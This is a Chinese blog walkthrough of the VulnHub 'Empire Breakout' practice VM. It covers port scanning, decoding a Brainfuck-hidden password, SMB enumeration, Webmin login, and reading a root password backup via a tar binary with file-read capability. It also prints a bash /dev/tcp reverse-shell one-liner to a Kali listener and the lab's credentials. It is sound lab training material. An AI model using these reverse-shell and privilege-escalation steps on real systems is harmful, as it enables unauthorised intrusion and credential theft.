[ vulnhub靶机通关篇 ] Empire Breakout 通关详解

待我称王封你为后i 2024-04-29 02:16 10阅读 0赞

> ## 🍬 博主介绍 ##
> 
> 👨🎓 博主介绍：大家好，我是 [\_PowerShell][PowerShell] ，很高兴认识大家~  
> ✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】  
> 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋  
> 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋  
> 🙏作者水平有限，欢迎各位大佬指点，相互学习进步！  
> Vulhub是一个面向大众的开源漏洞靶场，无需docker知识，简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。

#### 文章目录 ####

*  🍬 博主介绍
 *  一、环境搭建：
 *   *  1、下载靶场环境
     *  2、启动靶场环境
 *  二、渗透靶场
 *   *  1、目标：
     *  2、信息收集：查看端口和服务
     *  3、访问80端口发现提示信息得到一个密码
     *   *  1.访问一下web
         *  2.查看源码发现一段提示
         *  3.翻译解密提示信息
         *  4.brainfuck 语言简介
     *  4、访问10000和20000端口发现两个登录页
     *   *  1.访问10000端口
         *  2.访问20000端口
     *  5、收集有关靶机smb的信息获取到用户名cyber
     *   *  1.思路
         *  2.收集smb信息
         *  3.Enum4linux介绍
     *  6、利用获取的用户名和密码成功登录20000端口
     *  7、获取普通用户权限获取第一个flag
     *  8、获取root用户权限获取第一个flag
     *   *  1.查看当前权限
         *  2.发现tar可进行任意文件读取
         *  3.linux setcap命令的信息
         *  4.发现备份文件.old\_pass.bak
         *  5.利用tar读取密码备份文件
         *  6.成功读取root密码
         *  7.发现网页命令行无法执行su命令
         *  8.反弹靶机shell到kali方式解决上述问题
         *  9.使用root密码登录root用户，提权成功
 *  三、相关资源

## 一、环境搭建： ##

### 1、下载靶场环境 ###

> 靶场下载地址：

https://www.vulnhub.com/entry/empire-breakout,751/

> 下载下来的文件如下

![在这里插入图片描述][a46c89205dfa4c7fb456a3d40ae0cc00.png]

### 2、启动靶场环境 ###

> 下载下来是虚拟机压缩文件，直接用Vmvare导入就行。

![在这里插入图片描述][c2ad20c36ef44ce78d8f5b84a2e91f3e.png]

> 设置虚拟机名称

![在这里插入图片描述][5c569567c5b143cda039a3816d6f8334.png]

> 导入中

![在这里插入图片描述][052b21025bde4709a351cd24cd4bb9cc.png]

> 导入完成之后打开后把网络模式设置为NAT模式。  
> 虚拟机开启之后界面如下，我们可以看到虚拟机ip：192.168.233.175

![在这里插入图片描述][ab404ae2c065481886d9718d705093df.png]

## 二、渗透靶场 ##

### 1、目标： ###

> 目标就是我们搭建的靶场，靶场IP为：

192.168.233.175

### 2、信息收集：查看端口和服务 ###

> Nmap扫描靶机查看开启的端口和服务

nmap -sS -p 0-65535 -Pn -O 192.168.233.175

![在这里插入图片描述][11da005601fb4902aa78d14066372bb4.png]

> 发现开放了80端口，存在WEB，  
> 开放了139，445端口，存在SMB共享服务  
> 开启了10000、20000端口，存在Webmin MiniServ服务（Webmin 是功能强大的基于 Web 的 Unix/linux 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理操作。）

### 3、访问80端口发现提示信息得到一个密码 ###

#### 1.访问一下web ####

http://192.168.233.175/

![在这里插入图片描述][5686c28124584b16a0c7f0cf2832b069.png]

#### 2.查看源码发现一段提示 ####

![在这里插入图片描述][cbc0b6b41f2f42f7bd15d77f2da93a02.png]

#### 3.翻译解密提示信息 ####

> 提示的大概意思就是：  
> 翻译过来时：别担心没有人会来这里，和你分享我的权限是安全的。它是加密的：）  
> 也就是说这段奇奇怪怪的代码是加密文件，我们需要将他进行解密，这应该是密码经过某种加密或者编码形成的，经过一段时间的查找，发现是ook加密，是brainfuck加密方法的一种  
> 我们进行解密：解密工具：https://ctf.bugku.com/tool/brainfuck  
> 解密过后是：

.2uqPEfj3D<P’a-3

![在这里插入图片描述][7ce6b5d5421c4f5cbec0554fd09652fd.png]

#### 4.brainfuck 语言简介 ####

> brainfuck 语言用 > < + - . , \[ \] 八种符号来替换C语言的各种语法和命令，具体规则如下：  
> Brainfuck 编程语言由八个命令组成，每个命令都表示为一个字符。

> 增加指针。 
    < 减少指针。 
    + 增加指针处的字节。 
    - 减少指针处的字节。 
    . 输出指针处的字节。 
    , 输入一个字节并将其存储在指针处的字节中。 
    [ 跳过匹配项] 如果指针处的字节为零。 
    ] 向后跳转到匹配的 [ 除非指针处的字节为零。 
    Brainfuck 命令的语义也可以用 C 语言简洁地表达，如下（假设 p 之前已定义为 char*）： 
    > 变为 ++p; 
    < 变成 --p; 
    + 变为 ++*p； 
    - 变成 --*p; 
    . 变成 putchar(*p); 
    , 变成 *p = getchar(); 
    [ 变成 while (*p) {
         
    ] 变成 }

### 4、访问10000和20000端口发现两个登录页 ###

> 有一种强烈的预感，这是一段密码，先记录下来，接着我们继续查看另外两个网站  
> 10000端口和20000端口是不同的登录系统，一个是登录网站的，一个是登录用户的

#### 1.访问10000端口 ####

https://192.168.233.175:10000/session_login.cgi

![在这里插入图片描述][b43f187f48224b639f9924523120fa8b.png]

#### 2.访问20000端口 ####

https://192.168.233.175:20000/

![在这里插入图片描述][bae00c04fdca47e885e4aa5393fa1f3a.png]

### 5、收集有关靶机smb的信息获取到用户名cyber ###

#### 1.思路 ####

> 鉴于我们已经有了用户的密码，所以我们要着手寻找用户名了  
> 由于靶机开放了smb服务，所以我们可以收集有关靶机smb的信息

#### 2.收集smb信息 ####

> 使用命令enum4linux可以收集大量的信息

enum4linux 192.168.233.175

![在这里插入图片描述][433684908ea8480482f98b679be9ec5d.png]

> 最终发现了一个用户名cyber

![在这里插入图片描述][d8e2b65eeba2424996ed79be925455a0.png]

#### 3.Enum4linux介绍 ####

> Enum4linux是一个用于枚举来自Windows和Samba系统的信息的工具。 它试图提供与以前从www.bindview.com可用的enum.exe类似的功能。它是用Perl编写的，基本上是一个包装Samba工具smbclient，rpclient，net和nmblookup。  
> 用法:

./enum4linux.pl [选项] ip地址
    
    枚举选项：
         -U        获取用户列表
         -M        获取机器列表*
         -S        获取共享列表
         -P        获取密码策略信息
         -G        获取组和成员列表
         -d        详述适用于-U和-S
         -u user   用户指定要使用的用户名（默认""）
         -p pass   指定要使用的密码（默认为""）
    
    以下选项是enum.exe未实现的: -L, -N, -D, -f
    
    其他选项:
        -a        做所有简单枚举（-U -S -G -P -r -o -n -i），如果您没有提供任何其他选项，则启用此选项
        -h        显示此帮助消息并退出
        -r        通过RID循环枚举用户
        -R range  RID范围要枚举（默认值：500-550,1000-1050，隐含-r）
        -K n      继续搜索RID，直到n个连续的RID与用户名不对应，Impies RID范围结束于999999.对DC有用
        -l        通过LDAP 389 / TCP获取一些（有限的）信息（仅适用于DN）
        -s        文件暴力猜测共享名称
        -k user   远程系统上存在的用户（默认值：administrator，guest，krbtgt，domain admins，root，bin，none）
                  用于获取sid与“lookupsid known_username”
                  使用逗号尝试几个用户：“-k admin，user1，user2”
        -o        获取操作系统信息
        -i        获取打印机信息
        -w wrkg   手动指定工作组（通常自动找到）
        -n        做一个nmblookup（类似于nbtstat）
    -v        详细输出，显示正在运行的完整命令（net，rpcclient等）

### 6、利用获取的用户名和密码成功登录20000端口 ###

> 由于20000端口是登录用户的，我们拿用户名cyber和之前获得的密码去登录一下20000端口，登陆成功

![在这里插入图片描述][314ec67e66bf454a88d2fd57b8646bed.png]

### 7、获取普通用户权限获取第一个flag ###

> 登录进去摸索了一会儿，发现左下角有一个终端的图标，点进去之后就可以运行命令了

![在这里插入图片描述][0eb7672b4556467cbe8f82f6dd7ed6a9.png]

> 进入命令行，执行ls发现有一个user.txt文件，使用cat查看，得到第一个flag

ls
    cat user.txt

![在这里插入图片描述][4c7e8125dab94158b829a495cf935a6a.png]

### 8、获取root用户权限获取第一个flag ###

#### 1.查看当前权限 ####

> 执行whoami发现是用户权限

whoami

![在这里插入图片描述][77e2bc511d624c35ac0c52340d50492b.png]

#### 2.发现tar可进行任意文件读取 ####

> 通过ls -l查看文件权限，发现tar具有执行权限，猜想他是一个可执行文件

ls -l

![在这里插入图片描述][4951828db8fe42e784afc848748bbe4d.png]

> 通过getcap命令查看文件拥有的权限是什么

getcap tar

> 发现cap\_dac\_read \_search=ep，说明他是可以读取任意文件的

![在这里插入图片描述][2cc0cab939574b17ba18c5180f20e660.png]

#### 3.linux setcap命令的信息 ####

https://blog.csdn.net/megan_free/article/details/100357702\

#### 4.发现备份文件.old\_pass.bak ####

> 既然给了我们一个可进行任意读取的可执行文件，那就肯定是要我们找一个文件来读取，获得root的密码。  
> 经过一段时间的寻找之后，发现/var/backups下有个备份文件.old\_pass.bak

![在这里插入图片描述][8707bb1a1bc04213b432b16824f6a115.png]

#### 5.利用tar读取密码备份文件 ####

> 我们用tar把它打包之后再解压出来，就没有权限问题了

./tar -cvf pass.tar /var/backups/.old_pass.bak
    tar -xvf pass.tar

> 这里打包的时候一定要使用./tar，不然会提示没权限，没有加./代表的是你用的系统安装的tar不是这个目录下的tar，就不一定会有读取任意文件的权限

![在这里插入图片描述][20202df8fca84eeb8ea7b3c1d7f587f4.png]

> 我们的用户目录下多了两个文件

![在这里插入图片描述][c2a36121804b43b4856a27c606dd7846.png]

#### 6.成功读取root密码 ####

cat var/backups/.old_pass.bak

> 得到root密码：

Ts&4&YurgtRX(=~h

![在这里插入图片描述][f6dcf98bfefb4c7ea18232c7adabd14f.png]

#### 7.发现网页命令行无法执行su命令 ####

> 切换到root用户

su root

> 发现这里执行不了su

![在这里插入图片描述][3d1eb8c761284486a08921e76114cbeb.png]

#### 8.反弹靶机shell到kali方式解决上述问题 ####

> 反弹shell后  
> 那那那，我干脆反弹一个shell到我的kali吧  
> Kali监听

nc -lvvp 55555

![在这里插入图片描述][89cae150962040bf864bc47edb9bcf25.png]

> 靶机连接

bash -i >& /dev/tcp/192.168.233.130/55555 0>&1

![在这里插入图片描述][5ec2eaf3db37479b8ea74877b9189a04.png]

> 攻击机获取到靶机的shell

![在这里插入图片描述][431389b41cb241fa8c888e617218385f.png]

#### 9.使用root密码登录root用户，提权成功 ####

> 切换到root用户

su root

> 执行whoami 发现是root权限，提权成功

![在这里插入图片描述][b0f77695c91240b284aa5cd669a8470b.png]

> 得到第二个flag

cd /root
    cat rOOt.txt

![在这里插入图片描述][67ebd906a15f47f6b83b181a03c77207.png]

## 三、相关资源 ##

[ 1、靶场下载地址 ][1_]  
[ 2、ook在线解密工具 ][2_ook_]  
[ 3、enum4linux枚举工具 ][3_enum4linux_]  
[ 4、Brainfuck介绍 ][4_Brainfuck_]  
[ 5、\[ 隧道技术 \] 反弹shell的集中常见方式（二）bash 反弹shell ][5_ _ _ _shell_bash _shell]  
[ 6、\[ 隧道技术 \] 反弹shell的集中常见方式（一）nc反弹shell ][6_ _ _ _shell_nc_shell]

[PowerShell]: https://blog.csdn.net/qq_51577576
[a46c89205dfa4c7fb456a3d40ae0cc00.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/38fe8c7521e24828ba116187bda21d23.png
[c2ad20c36ef44ce78d8f5b84a2e91f3e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b1182f16257948548af55b68d23f6984.png
[5c569567c5b143cda039a3816d6f8334.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/659e6185a8054351bf0cacce9f52481b.png
[052b21025bde4709a351cd24cd4bb9cc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/d8e0c34b3bf345b48946e0f99812c38f.png
[ab404ae2c065481886d9718d705093df.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/899be20e26e447d4b7f8bed89f048576.png
[11da005601fb4902aa78d14066372bb4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/79bccd855da64ddca3a70ea8a7bd2139.png
[5686c28124584b16a0c7f0cf2832b069.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/6b96109d332142b493e756270c827b8c.png
[cbc0b6b41f2f42f7bd15d77f2da93a02.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b1c329d8429b449884a7d78af39b1e8f.png
[7ce6b5d5421c4f5cbec0554fd09652fd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/0e98709a00464aba98258964204afa3c.png
[b43f187f48224b639f9924523120fa8b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/2e8f33d55f804848ad5beacb1167b6fc.png
[bae00c04fdca47e885e4aa5393fa1f3a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b4de4179e2df4981960fa6bc697b4628.png
[433684908ea8480482f98b679be9ec5d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/aed69fb2bc8c4745b692849fde565d48.png
[d8e2b65eeba2424996ed79be925455a0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/7698d393cdd04ec88017e3edf721acb2.png
[314ec67e66bf454a88d2fd57b8646bed.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/b32d0fdda42941249a41d29f04b8079e.png
[0eb7672b4556467cbe8f82f6dd7ed6a9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/628ed552ad03429992491e6aa074b661.png
[4c7e8125dab94158b829a495cf935a6a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/2e5925ba98a2428a853c41488f57ea7b.png
[77e2bc511d624c35ac0c52340d50492b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/02442ae013f94dcaa44878c73ce04d28.png
[4951828db8fe42e784afc848748bbe4d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/7e1a039fae374cd8b077033e983cd62a.png
[2cc0cab939574b17ba18c5180f20e660.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/d470eee5c275404a9da6a0c6867e2a17.png
[8707bb1a1bc04213b432b16824f6a115.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/a9d7e6d3dcd1477e9f1ff7165aeb87cd.png
[20202df8fca84eeb8ea7b3c1d7f587f4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/e6c4c8369e0f4d128268384e7f68e8c3.png
[c2a36121804b43b4856a27c606dd7846.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/0196c14d80254e86acf3b0aef7b9aa3d.png
[f6dcf98bfefb4c7ea18232c7adabd14f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/773197620d3f44bea43fc3cb1a6c5745.png
[3d1eb8c761284486a08921e76114cbeb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/255b7fe0bef54808a54378c5e50ae7dc.png
[89cae150962040bf864bc47edb9bcf25.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/069ced87a65948218f5fd5fce3b8062a.png
[5ec2eaf3db37479b8ea74877b9189a04.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/2f0be06d11c04b3095e7dd5800f646e1.png
[431389b41cb241fa8c888e617218385f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/70dc5759bef649e985ad645bb16614fe.png
[b0f77695c91240b284aa5cd669a8470b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/6862b24f132f44d2ab0156dc68346960.png
[67ebd906a15f47f6b83b181a03c77207.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/29/6f17b0a2f7c4484988675397ef010900.png
[1_]: https://www.vulnhub.com/entry/empire-breakout,751/
[2_ook_]: https://ctf.bugku.com/tool/brainfuck
[3_enum4linux_]: https://blog.csdn.net/qq_63844103/article/details/127219997
[4_Brainfuck_]: https://baike.baidu.com/item/Brainfuck/1152785
[5_ _ _ _shell_bash _shell]: https://blog.csdn.net/qq_51577576/article/details/126651576
[6_ _ _ _shell_nc_shell]: https://blog.csdn.net/qq_51577576/article/details/126128251